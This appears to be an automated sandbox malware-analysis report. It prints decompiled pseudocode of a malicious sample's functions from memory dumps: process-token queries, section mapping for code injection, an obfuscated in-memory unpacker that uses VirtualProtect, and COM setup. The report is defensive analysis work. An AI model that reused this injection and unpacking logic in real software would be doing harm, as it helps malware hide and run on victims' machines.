Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 66415017918aaf0af723474e7b1c90df0a379cabaa96386aa5ac36c257a12ce5
Instruction ID: 4df57ceec5b472c32cf5ca91ce3b4754a31aa5c1f0fbaaa634d3bae2382e22ce
Opcode Fuzzy Hash: 66415017918aaf0af723474e7b1c90df0a379cabaa96386aa5ac36c257a12ce5
Instruction Fuzzy Hash: B331F675A00205EFDB11DF69DC81F6EFBF9EB68700B214029E405D6620DB70EE519B51

Uniqueness

Uniqueness Score: -1.00%

Function 001C83B7, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001C83B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E001C2049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E001C9039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x001c83c4
0x001c83c5
0x001c83c6
0x001c83c7
0x001c83c8
0x001c83cc
0x001c83d3
0x001c83e2
0x001c83e5
0x001c83e8
0x001c83ef
0x001c83f2
0x001c83f5
0x001c83f8
0x001c83fb
0x001c8406
0x001c8408
0x001c8411
0x001c8419
0x001c841b
0x001c842d
0x001c8437
0x001c843b
0x001c844a
0x001c844e
0x001c8457
0x001c845f
0x001c845f
0x001c8461
0x001c8461
0x001c8469
0x001c846f
0x001c8473
0x001c8473
0x001c847e

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001C83FE
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 001C8411
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001C842D

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001C844A
memcpy.NTDLL(00000000,00000000,0000001C), ref: 001C8457
NtClose.NTDLL(?), ref: 001C8469
NtClose.NTDLL(00000000), ref: 001C8473

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 20408357adedb30ddab3cf907190b00dc85b9e77d6643878c8bffb13b224774a
Instruction ID: 7a2bad3cab13c6c434977d2dc112db40b9d651ef4803680c0be07d0d378a28ac
Opcode Fuzzy Hash: 20408357adedb30ddab3cf907190b00dc85b9e77d6643878c8bffb13b224774a
Instruction Fuzzy Hash: 4621D2B2A00219FBDB11AF95CC85EDEBFBDEB28750F104026F904E6121D771DA949BE0

Uniqueness

Uniqueness Score: -1.00%

Function 10001EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10001EB5(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001D9F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x10001ebe
0x10001ec5
0x10001ec6
0x10001ec7
0x10001ec8
0x10001ec9
0x10001eda
0x10001ede
0x10001ef2
0x10001ef5
0x10001ef8
0x10001eff
0x10001f02
0x10001f09
0x10001f0c
0x10001f0f
0x10001f12
0x10001f17
0x10001f52
0x10001f19
0x10001f1c
0x10001f22
0x10001f27
0x10001f2b
0x10001f49
0x10001f2d
0x10001f34
0x10001f42
0x10001f42
0x10001f2b
0x10001f5a

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,70D9FFF6,00000000,00000000,?), ref: 10001F12

Part of subcall function 10001D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001F27,00000002,00000000,?,?,00000000,?,?,10001F27,00000002), ref: 10001DCC

memset.NTDLL ref: 10001F34

Strings

@, xrefs: 10001F02

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
Instruction ID: 22cae9f40a45f0817b401b8017966300679b6c07c9eb41be9fd604c10ac2f23b
Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
Instruction Fuzzy Hash: 4821D8B6D00209AFDB11DFA9C8849EEFBB9EB48354F10447AE615F7210D735AA498B60

Uniqueness

Uniqueness Score: -1.00%

Function 002A348F, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E002A348F(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __ebp;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t205;
				signed int _t211;
				void* _t212;
				signed int _t215;
				signed int _t218;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t226;
				void* _t236;
				void* _t243;
				void* _t245;
				signed int _t247;
				signed int _t259;
				long _t262;
				long _t265;
				signed int _t270;
				signed int _t275;
				signed int _t278;
				signed int _t280;
				signed int _t282;
				void* _t286;
				signed int _t287;
				void* _t292;
				void* _t293;
				DWORD* _t294;
				signed int _t299;
				signed int _t302;
				signed int _t305;
				signed int _t308;
				void* _t309;
				signed int _t313;
				signed int _t320;
				long _t325;
				signed int* _t333;

				_t299 = __esi;
				_t275 = __edi;
				_t258 = __edx;
				_t229 = __ecx;
				_t223 = __ebx;
				if( *(__ebx + 0x41820f) == 0) {
					_push(_v20);
					 *_t333 = __ecx;
					_push(__edi);
					 *_t333 =  *_t333 & 0x00000000;
					 *_t333 =  *_t333 | __edx;
					_t195 =  *((intOrPtr*)(__ebx + 0x45d020))();
					_v20 = __ecx;
					 *(__ebx + 0x41820f) =  *(__ebx + 0x41820f) & 0x00000000;
					 *(__ebx + 0x41820f) =  *(__ebx + 0x41820f) | __ecx ^ _v20 | _t195;
					_pop(_t258);
					_pop(_t229);
				}
				_push(_t325);
				 *_t333 =  *_t333 - _t325;
				 *_t333 =  *_t333 ^ _t258;
				if( *(_t223 + 0x418637) == 0) {
					_v12 = _v12 & 0x00000000;
					 *_t333 =  *_t333 | _t229;
					_t195 =  *((intOrPtr*)(_t223 + 0x45d024))(_v12);
					_v12 = _t299;
					 *(_t223 + 0x418637) =  *(_t223 + 0x418637) & 0x00000000;
					 *(_t223 + 0x418637) =  *(_t223 + 0x418637) | _t299 - _v12 ^ _t195;
					_t299 = _v12;
					_pop(_t229);
				}
				_v20 = _v20 & 0x00000000;
				_push(_v20);
				 *_t333 =  *_t333 ^ _t229;
				if( *(_t223 + 0x4181e7) == 0) {
					_v32 =  *((intOrPtr*)(_t223 + 0x418351));
					_t325 = _t325;
					_v40 =  *((intOrPtr*)(_t223 + 0x418073));
					_t320 = _t299;
					_t275 = _v44;
					_v44 =  *((intOrPtr*)(_t223 + 0x418147));
					_t195 =  *((intOrPtr*)(_t223 + 0x45d044))(_t275, _t275, _t325, _t325);
					_v20 = _t320;
					 *(_t223 + 0x4181e7) =  *(_t223 + 0x4181e7) & 0x00000000;
					 *(_t223 + 0x4181e7) =  *(_t223 + 0x4181e7) | _t320 - _v20 | _t195;
					_t299 = _v20;
				}
				_v12 = _t275;
				_t197 = _t195 & 0x00000000 | _t275 ^ _v12 | _a4;
				_t278 = _v12;
				if( *(_t223 + 0x4182f3) == 0) {
					_v16 = _v16 & 0x00000000;
					_v32 = _v32 + _t197;
					_t222 =  *((intOrPtr*)(_t223 + 0x45d024))(_v16);
					_v12 = _t229;
					 *(_t223 + 0x4182f3) =  *(_t223 + 0x4182f3) & 0x00000000;
					 *(_t223 + 0x4182f3) =  *(_t223 + 0x4182f3) | _t229 & 0x00000000 ^ _t222;
					_t229 = _v12;
					_pop(_t197);
				}
				_t198 = _t197 +  *((intOrPtr*)(_t197 + 0x3c));
				if( *(_t223 + 0x418577) == 0) {
					_v32 = _v32 - _t223;
					_v32 = _v32 + _t198;
					_v40 =  *((intOrPtr*)(_t223 + 0x418197));
					_v44 = _v44 & 0x00000000;
					_v44 = _v44 ^ _t278;
					_t229 = _v48;
					_v48 =  *((intOrPtr*)(_t223 + 0x418193));
					_v52 =  *((intOrPtr*)(_t223 + 0x418320));
					_t221 =  *((intOrPtr*)(_t223 + 0x45d048))(_v40, _t325, _t229, 0, _t223);
					_v12 = _t258;
					 *(_t223 + 0x418577) =  *(_t223 + 0x418577) & 0x00000000;
					 *(_t223 + 0x418577) =  *(_t223 + 0x418577) | _t258 - _v12 ^ _t221;
					_t258 = _v12;
					_t198 = _t198;
				}
				_v20 = 0;
				_push(_v20);
				_v32 = _v32 | _t198;
				if( *(_t223 + 0x418583) == 0) {
					_v12 = _v12 & 0x00000000;
					 *_t333 =  *_t333 ^ _t198;
					_v40 =  *((intOrPtr*)(_t223 + 0x41848b));
					_v44 =  *((intOrPtr*)(_t223 + 0x4180ab));
					_t278 = _t278;
					_v48 = _t229;
					_v52 =  *((intOrPtr*)(_t223 + 0x4185df));
					_t299 = _t299;
					_v56 =  *((intOrPtr*)(_t223 + 0x418263));
					_t270 = _t258;
					_t218 =  *((intOrPtr*)(_t223 + 0x45d048))(_t229, _v16, _t229, _t198, _v12);
					 *(_t223 + 0x418583) =  *(_t223 + 0x418583) & 0x00000000;
					 *(_t223 + 0x418583) =  *(_t223 + 0x418583) ^ _t270 & 0x00000000 ^ _t218;
					_t258 = _t270;
					_t198 = _t278;
				}
				_v12 = _t299;
				_t280 = _t278 & 0x00000000 | _t299 & 0x00000000 ^ _t198;
				_t302 = _v12;
				if( *(_t223 + 0x418117) == 0) {
					_t215 =  *((intOrPtr*)(_t223 + 0x45d024))();
					_v12 = _t302;
					 *(_t223 + 0x418117) =  *(_t223 + 0x418117) & 0x00000000;
					 *(_t223 + 0x418117) =  *(_t223 + 0x418117) ^ _t302 ^ _v12 ^ _t215;
					_t302 = _v12;
				}
				_t199 =  *(_t280 + 6) & 0x0000ffff;
				if( *((intOrPtr*)(_t223 + 0x41829b)) == 0) {
					_v16 = 0;
					 *_t333 =  *_t333 + _t199;
					_push( *((intOrPtr*)(_t223 + 0x45d024))(_v16));
					_pop( *_t108);
					_push(_v16);
					_pop( *_t110);
					_pop(_t199);
				}
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ _t302 ^  *_t333 ^ _t199;
				_t305 = _t302;
				if( *(_t223 + 0x41806f) == 0) {
					_push(_t325);
					 *_t333 =  *(_t223 + 0x4182df);
					_push(_t280);
					_push( *_t333);
					_v40 =  *((intOrPtr*)(_t223 + 0x418340));
					_pop(_t325);
					_v44 =  *((intOrPtr*)(_t223 + 0x41817b));
					_t243 = _t229;
					_v48 =  *((intOrPtr*)(_t223 + 0x4185ff));
					_t245 = _t243;
					_v52 =  *((intOrPtr*)(_t223 + 0x4184eb));
					_t247 = _t245;
					_t199 =  *((intOrPtr*)(_t223 + 0x45d048))(_t325, _t243, _t199);
					 *(_t223 + 0x41806f) =  *(_t223 + 0x41806f) & 0x00000000;
					 *(_t223 + 0x41806f) =  *(_t223 + 0x41806f) | _t247 ^ _v56 ^ _t199;
					_t229 = _t247;
				}
				_push(_t258);
				 *_t333 =  *_t333 - _t258;
				 *_t333 = _t280;
				if( *(_t223 + 0x4180b7) == 0) {
					_t199 =  *((intOrPtr*)(_t223 + 0x45d024))();
					 *(_t223 + 0x4180b7) =  *(_t223 + 0x4180b7) & 0x00000000;
					 *(_t223 + 0x4180b7) =  *(_t223 + 0x4180b7) | _t229 - _v40 ^ _t199;
					_t229 = _t229;
				}
				_v20 = _t305;
				_t259 =  *(_t280 + 0x54);
				_t308 = _v20;
				if( *(_t223 + 0x41812b) == 0) {
					_v12 = _v12 & 0x00000000;
					_v40 = _v40 ^ _t259;
					_t199 =  *((intOrPtr*)(_t223 + 0x45d020))(_v12);
					 *(_t223 + 0x41812b) =  *(_t223 + 0x41812b) & 0x00000000;
					 *(_t223 + 0x41812b) =  *(_t223 + 0x41812b) | _t280 & 0x00000000 | _t199;
					_t280 = _t280;
					_pop(_t259);
				}
				_v12 = _t199;
				_t282 = _t280 & 0x00000000 ^ _t199 & 0x00000000 ^  *(_t223 + 0x4180f7);
				_t202 = _v12;
				if( *(_t223 + 0x4181df) == 0) {
					_v40 = _v40 & 0x00000000;
					_v40 = _v40 | _t259;
					_v48 =  *((intOrPtr*)(_t223 + 0x418444));
					_v16 = 0;
					_v52 = _v52 | _t223;
					_t202 =  *((intOrPtr*)(_t223 + 0x45d040))(_v16, _t259, 0, _t308);
					 *(_t223 + 0x4181df) =  *(_t223 + 0x4181df) & 0x00000000;
					 *(_t223 + 0x4181df) =  *(_t223 + 0x4181df) | _t229 - _v56 | _t202;
					_t229 = _t229;
					_pop(_t259);
				}
				_v40 = _t259;
				_t309 = _a4;
				_t262 = 0;
				_v16 = _t282;
				_t231 = _t229 & 0x00000000 | _t282 - _v16 | _t262;
				if(_v16 != _t309) {
					do {
						asm("movsb");
						_t231 = _t231 - 1;
					} while (_t231 != 0);
					_v12 = _t309;
					_t294 =  *(_t223 + 0x4180f7);
					_t309 = _v12;
					 *(_t223 + 0x4184cf) = 0x40;
					_v40 = _v40 & 0x00000000;
					_v40 = _v40 | _t223 + 0x004184cf;
					_v44 = 2;
					_v48 = _v48 - _t325;
					_v48 = _v48 | _t262;
					_v16 = _v16 & 0x00000000;
					_v52 = _v52 ^ _t294; // executed
					_t202 = VirtualProtect(_v16, _t325, _t262, _t294);
				}
				_pop(_t286);
				_t287 = _t286 + 0xf8;
				_t226 = _t223;
				do {
					_v12 = _v12 & 0x00000000;
					_push(_v12);
					 *_t333 =  *_t333 | _t287;
					_v16 = _t202;
					_t205 = _v16;
					_v16 = _t205;
					_t309 = (_t309 & 0x00000000 ^ _t202 & 0x00000000 ^ _a4) +  *((intOrPtr*)(_t287 + 0x14));
					_t202 = memcpy( *((intOrPtr*)(_t287 + 0xc)) +  *(_t226 + 0x4180f7), _t309, _t231 & 0x00000000 ^ _t205 & 0x00000000 ^  *(_t287 + 0x10));
					_t333 =  &(_t333[3]);
					_t231 = 0;
					_pop(_t292);
					_t287 = _t292 + 0x28;
					_t226 = _t226;
					_t187 =  &_v8;
					 *_t187 = _v8 - 1;
				} while ( *_t187 != 0);
				_pop(_t293);
				_push(_t325);
				_t211 = (_t202 & 0x00000000 | _t325 - _v32 |  *(_t293 + 0x28)) +  *(_t226 + 0x4180f7);
				_v32 = 0;
				 *(_t226 + 0x418418) = 0 ^ _t211;
				_t236 = 0;
				_v12 = _t262;
				_t313 = _t309 & 0x00000000 | _t262 & 0x00000000 ^  *(_t226 + 0x4180f7);
				_t265 = _v12;
				if(_t313 > 0) {
					_push(_t226);
					_v32 = _v32 ^ _t226;
					_v32 = _v32 | _t313;
					_t212 = E002A20EE(_t226, _t236, _t265, _t293, _t313);
					 *_t333 =  *_t333 & 0x00000000;
					 *_t333 =  *_t333 ^ _t313;
					_t211 = E002A5AF6(_t212, _t226, _t236, _t265, _t293, _t313, _t236);
				}
				return _t211;
			}

0x002a348f
0x002a348f
0x002a348f
0x002a348f
0x002a348f
0x002a349c
0x002a349e
0x002a34a1
0x002a34a4
0x002a34a5
0x002a34a9
0x002a34ac
0x002a34b2
0x002a34ba
0x002a34c1
0x002a34ca
0x002a34cb
0x002a34cb
0x002a34cc
0x002a34cd
0x002a34d0
0x002a34da
0x002a34dc
0x002a34e3
0x002a34e6
0x002a34ec
0x002a34f4
0x002a34fb
0x002a3501
0x002a3504
0x002a3504
0x002a3505
0x002a3509
0x002a350c
0x002a3516
0x002a3520
0x002a3524
0x002a352e
0x002a3532
0x002a353a
0x002a353a
0x002a353d
0x002a3543
0x002a354b
0x002a3552
0x002a3558
0x002a3558
0x002a355b
0x002a3567
0x002a3569
0x002a3573
0x002a3575
0x002a357c
0x002a357f
0x002a3585
0x002a358d
0x002a3594
0x002a359a
0x002a359d
0x002a359d
0x002a359e
0x002a35a8
0x002a35ab
0x002a35ae
0x002a35ba
0x002a35be
0x002a35c2
0x002a35cc
0x002a35cc
0x002a35d6
0x002a35d9
0x002a35df
0x002a35e7
0x002a35ee
0x002a35f4
0x002a35f7
0x002a35f7
0x002a35f8
0x002a35ff
0x002a3602
0x002a360c
0x002a360e
0x002a3615
0x002a361f
0x002a362a
0x002a362e
0x002a3632
0x002a363d
0x002a3641
0x002a364a
0x002a364e
0x002a364f
0x002a365b
0x002a3662
0x002a3668
0x002a3669
0x002a3669
0x002a366a
0x002a3675
0x002a3677
0x002a3681
0x002a3683
0x002a3689
0x002a3691
0x002a3698
0x002a369e
0x002a369e
0x002a36a1
0x002a36ac
0x002a36ae
0x002a36b8
0x002a36c1
0x002a36c2
0x002a36c5
0x002a36c8
0x002a36ce
0x002a36ce
0x002a36d5
0x002a36d9
0x002a36dc
0x002a36e4
0x002a36e6
0x002a36ed
0x002a36f0
0x002a36f1
0x002a36f8
0x002a36fc
0x002a3705
0x002a3709
0x002a3712
0x002a3716
0x002a371f
0x002a3723
0x002a3724
0x002a3730
0x002a3737
0x002a373d
0x002a373d
0x002a373e
0x002a373f
0x002a3742
0x002a374c
0x002a374e
0x002a375a
0x002a3761
0x002a3767
0x002a3767
0x002a3768
0x002a3770
0x002a3772
0x002a377c
0x002a377e
0x002a3785
0x002a3788
0x002a3794
0x002a379b
0x002a37a1
0x002a37a2
0x002a37a2
0x002a37a3
0x002a37b2
0x002a37b4
0x002a37be
0x002a37c1
0x002a37c5
0x002a37d1
0x002a37d4
0x002a37de
0x002a37e1
0x002a37ed
0x002a37f4
0x002a37fa
0x002a37fb
0x002a37fb
0x002a37fe
0x002a3806
0x002a3808
0x002a3809
0x002a3814
0x002a381b
0x002a381d
0x002a381d
0x002a381e
0x002a381e
0x002a3821
0x002a382c
0x002a382e
0x002a3831
0x002a3842
0x002a3846
0x002a384a
0x002a3852
0x002a3855
0x002a3858
0x002a385f
0x002a3862
0x002a3862
0x002a3868
0x002a3872
0x002a3874
0x002a3875
0x002a3875
0x002a3879
0x002a387c
0x002a387f
0x002a388d
0x002a3890
0x002a38a1
0x002a38ad
0x002a38ad
0x002a38ad
0x002a38af
0x002a38b9
0x002a38bb
0x002a38bc
0x002a38bc
0x002a38bc
0x002a38c1
0x002a38c2
0x002a38cf
0x002a38d7
0x002a38de
0x002a38e4
0x002a38e5
0x002a38f4
0x002a38f6
0x002a38fc
0x002a38fe
0x002a38ff
0x002a3902
0x002a3905
0x002a390b
0x002a390f
0x002a3912
0x002a3912
0x002a391a

APIs

VirtualProtect.KERNELBASE(00000000,?,00000000,?,?,00000000,00000000), ref: 002A3862

Strings

@, xrefs: 002A3831

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 45ff06a93b9dab7e30dae66d33c620778585e23986d508cd26357393324dd102
Instruction ID: f49d0b6a4378a4961781508fd200acf5c2326b4abb968e1ab412a1ad3c4a77fc
Opcode Fuzzy Hash: 45ff06a93b9dab7e30dae66d33c620778585e23986d508cd26357393324dd102
Instruction Fuzzy Hash: CDF16E72C14204EFEB049F64C8897AEBBF5FF84715F1584ADEC88AB145CB782550CB68

Uniqueness

Uniqueness Score: -1.00%

Function 001C7B5D, Relevance: 3.1, APIs: 2, Instructions: 82
comCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E001C7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x1cd27c; // 0x317a7d0
				_t2 = _t22 + 0x1ce0dc; // 0x33488ac
				_t3 = _t22 + 0x1ce0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x1cd15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x1cd27c; // 0x317a7d0
						_t8 = _t36 + 0x1ce3b8; // 0x5f005f
						E001C908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x1cd158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}

0x001c7b6a
0x001c7b6f
0x001c7b7b
0x001c7b81
0x001c7b84
0x001c7b87
0x001c7b8d
0x001c7b91
0x001c7b96
0x001c7b9c
0x001c7ba4
0x001c7bab
0x001c7bb0
0x001c7bb0
0x001c7bb3
0x001c7bc9
0x001c7bcd
0x001c7bdc
0x001c7be2
0x001c7be6
0x001c7be9
0x001c7bf5
0x001c7beb
0x001c7bee
0x001c7bee
0x001c7be9
0x001c7bfa
0x001c7bff
0x001c7bff
0x001c7c02
0x001c7c08
0x001c7c08
0x001c7c11

APIs

CoCreateInstance.OLE32(4590F811,00000000,00000001,033488AC,7671BB27), ref: 001C7B87
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001C7BDC

Part of subcall function 001C908B: CoCreateInstance.OLE32(674B6698,00000000,00000001,033488CC,?), ref: 001C90C4

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateInstance$BlanketProxy
String ID:
API String ID: 3291578418-0
Opcode ID: d79476cc07814274b2e370a42a40854d6a9c8c7e47f9b6f0c29f44938ce4ac37
Instruction ID: 8c8a6f588fcaade2002fda81ba918b2b5869441ca9965e2e5342a97853b25742
Opcode Fuzzy Hash: d79476cc07814274b2e370a42a40854d6a9c8c7e47f9b6f0c29f44938ce4ac37
Instruction Fuzzy Hash: 2F218C75600218BFCB10CFA4DC88E9EBBBDEF59750B1580A5F906DB250C771DA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001D9F, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001D9F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001db1
0x10001db7
0x10001dc5
0x10001dcc
0x10001dd1
0x10001dd7
0x00000000
0x10001dd8
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001F27,00000002,00000000,?,?,00000000,?,?,10001F27,00000002), ref: 10001DCC

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 49ce00a74c5026685ddf57a3213c5fc1fdcbf11da22bef7e297f1a427f47f248
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 42F01CB690020CBFEB119FA5DC85C9FBBBDEB44298B10497AB652E1094D6309E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 001C8B94, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001C8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x1cd018; // 0x294bbca
				asm("bswap eax");
				_t61 =  *0x1cd014; // 0xd5ce6b3c
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x1cd010; // 0xeb65f451
				asm("bswap eax");
				_t63 =  *0x1cd00c; // 0x35163570
				asm("bswap eax");
				_t64 =  *0x1cd27c; // 0x317a7d0
				_t3 = _t64 + 0x1ce633; // 0x74666f73
